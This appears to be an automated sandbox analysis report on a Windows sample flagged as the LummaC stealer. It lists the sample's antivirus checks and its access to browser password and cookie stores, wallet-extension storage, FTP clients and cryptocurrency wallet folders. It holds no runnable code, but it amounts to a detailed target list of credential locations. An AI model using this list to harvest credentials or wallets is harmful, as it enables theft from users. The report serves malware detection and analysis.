Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Dicks.pif, 00000017.00000003.3234780524.0000000001159000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Dicks.pif PID: 3248, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Dicks.pif, 00000017.00000003.3156346560.00000000011C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: s/Electrum-LTC
Source: Dicks.pif, 00000017.00000003.3264421996.0000000001173000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: Dicks.pif, 00000017.00000003.3156346560.00000000011C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: Dicks.pif, 00000017.00000002.3265878454.0000000001159000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: Dicks.pif, 00000017.00000003.3182152456.0000000001173000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: Dicks.pif, 00000017.00000003.3264715151.00000000011CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3
Source: Dicks.pif, 00000017.00000003.3155264925.0000000001164000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance
Source: Dicks.pif, 00000017.00000002.3265878454.0000000001159000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Ethereum
Source: Dicks.pif, 00000017.00000003.3156346560.00000000011C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: Dicks.pif, 00000017.00000003.3155264925.00000000011BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: Dicks.pif	Binary or memory string: WIN_81
Source: Dicks.pif	Binary or memory string: WIN_XP
Source: Dicks.pif	Binary or memory string: WIN_XPe
Source: Dicks.pif	Binary or memory string: WIN_VISTA
Source: Dicks.pif	Binary or memory string: WIN_7
Source: Dicks.pif	Binary or memory string: WIN_8
Source: Utility.8.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 4USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Directory queried: C:\Users\user\Documents	Jump to behavior
